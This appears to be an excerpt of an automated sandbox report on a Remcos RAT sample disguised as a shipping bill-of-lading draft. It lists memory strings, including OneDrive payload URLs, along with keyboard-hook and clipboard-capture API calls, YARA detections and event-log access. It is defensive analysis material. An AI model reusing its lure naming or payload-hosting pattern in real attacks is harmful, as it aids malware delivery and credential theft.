Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://ocspx.digicert.com0E
Source: xkn.exe, 0000000E.00000002.1720907085.000001F43AF95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://www.digicert.com/CPS0~
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000003.1834264521.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000003.1834180917.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000003.1834264521.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000003.1834180917.00000000005ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.comta
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865730661.0000000000193000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4094108405.00000000022F6000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1791549862.000000002754C000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4110547668.00000000264F0000.00000004.00001000.00020000.00000000.sdmp, glrkszlG.pif, glrkszlG.pif, 00000001.00000000.1681332436.0000000000416000.00000002.00000001.01000000.00000005.sdmp, glrkszlG.pif, 00000001.00000002.1772834423.000000000044B000.00000040.00000400.00020000.00000000.sdmp, glrkszlG.pif, 00000001.00000002.1772834423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, glrkszlG.pif, 00000001.00000001.1681718586.0000000000418000.00000040.00000001.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1898092311.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1857638446.0000000002456000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1859693106.0000000002A20000.00000040.00001000.00020000.00000000.sdmp, glrkszlG.pif.0.dr	String found in binary or memory: http://www.pmail.com
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: xkn.exe, 0000000E.00000002.1720907085.000001F43AF49000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 0000000E.00000002.1720907085.000001F43AF6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://c6c4bq.db.files.1drv.com/_wR;
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680814338.0000000000971000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://c6c4bq.db.files.1drv.com/y4mMjDna1hFKlb3gcMt7CCWqdkVpW0DS9Rs52USyRQhNgPBhPdYAV7L6hMIv9WCXM5X
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.000000000097D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://c6c4bq.db.files.1drv.com/y4muza8-AaN89J3KOPjgz4xuHsRw8GpbmeCTYrNNV8GxQvY6QuZ4f4Rksz00DRpN4rZ
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680814338.0000000000971000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://c6c4bq.db.files.1drv.com:443/y4mMjDna1hFKlb3gcMt7CCWqdkVpW0DS9Rs52USyRQhNgPBhPdYAV7L6hMIv9WC
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/d
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000003.1864575924.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
Source: glrkszlG.pif, 00000001.00000002.1772834423.00000000004B1000.00000040.00000400.00020000.00000000.sdmp, glrkszlG.pif, 00000001.00000001.1681718586.00000000004A3000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=7E01B4B465D32A9A%213365&authkey=
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv5415.tmp.36.dr	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49731 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2794A2B8 SetWindowsHookExA 0000000D,2794A2A4,00000000

0_2_2794A2B8

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2794B70E OpenClipboard,GetClipboardData,CloseClipboard,

0_2_2794B70E

Contains functionality to modify clipboard data

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	36_2_0040987A
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	36_2_004098E2
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	37_2_00406DFC
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	37_2_00406E9F

Contains functionality to read the clipboard data

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2794B70E OpenClipboard,GetClipboardData,CloseClipboard,

0_2_2794B70E

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2794A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

0_2_2794A3E0

Yara detected Keylogger Generic

Source: Yara match

File source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4092451794.000000000097D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1856524613.0000000000796000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.1933047287.000000000078C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Glzskrlg.PIF PID: 7804, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2795C9E2 SystemParametersInfoW,

0_2_2795C9E2

Reads the Security eventlog

Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior

Reads the System eventlog

